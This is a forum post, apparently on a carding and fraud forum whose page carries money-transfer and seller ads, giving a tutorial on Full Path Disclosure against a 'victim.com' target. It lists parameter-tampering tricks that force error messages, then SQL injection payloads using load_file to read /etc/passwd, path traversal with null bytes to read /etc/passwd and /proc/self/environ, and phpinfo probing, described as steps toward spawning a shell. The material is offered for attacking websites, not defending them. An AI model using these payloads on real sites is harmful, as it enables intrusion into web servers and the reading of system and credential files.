We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
[Tutorial] : Full Path Disclosure (+Updated)

#1
Full Path Disclosure, also known as FPD. Is a 'vuln' that pretty much does what it says. Shows the Full Path of the website.

Now FPD cant really be 'exploited' but with other vulns can help you further exploit the website. For example FPD would be useful for the INTO OUTFILE statements when trying to spawn a shell during SQLi Or also when load_file() doesnt work & so on.

The most common error shown in FPD would be :


Code:
Warning: function(function.name) [Function_name]: Some brief summary in /home/user/public_html/website/index.php on line 123




Tutorial

Method #1 : Switching parameter into an array


Code:
www.victim.com/index.php?id=3

=>

www.victim.com/index.php?id=[]3


Method #2 : Changing an integer to a string


Code:
www.victim.com/index.php?id=3

=>

www.victim.com/index.php?id=huey


Method #3 : Changing the cookie output to null

Code:
PHPSESSID=13882931834931984318

=>

PHPSESSID=


Method #4 : Using wrong file/page name

Code:
www.victim.com/index.php?page=views.php

=>

www.victim.com/index.php?page=huey.php



Method #5 : Changing the value

Code:
www.victim.com/index.php?id=3

=>

www.victim.com/index.php?id=3!
www.victim.com/index.php?id='3'
www.victim.com/index.php?id=3.1

Getting /etc/passwd

Code:
www.victim.com/index.php?id=3 UNION SELECT div 0 1,2,load_file('/etc/passwd'),4,5--

OR

www.victim.com/index.php?id=3 UNION SELECT div 0 1,2,load_file(0x2f6574632f706173737764),4,5--

AND

www.victim.com/index.php?page=../../etc/passwd%00

OR

www.victim.com/index.php?page=/proc/self/environ%00


FPD via phpinfo()

Code:
www.victim.com/phpinfo.php
www.victim.com/phpinfo/
www.victim.com/phpdetails.php



404 Page :: IIS Servers

Code:
www.victim.com/index.php

=>

www.victim.com/huey.php

This method usually works on .asp / .aspx sites.


Alright, thats the end of my tutorial.
Reply
Paid adv. expire in 31 days
CLICK to buy Advertisement !

    Verified & Trusted WesternUnion / MoneyGram / Bank - Transferring -WorldWide [ MTCN in 3 hours ]


#2
thank you very much
Reply



Forum Jump: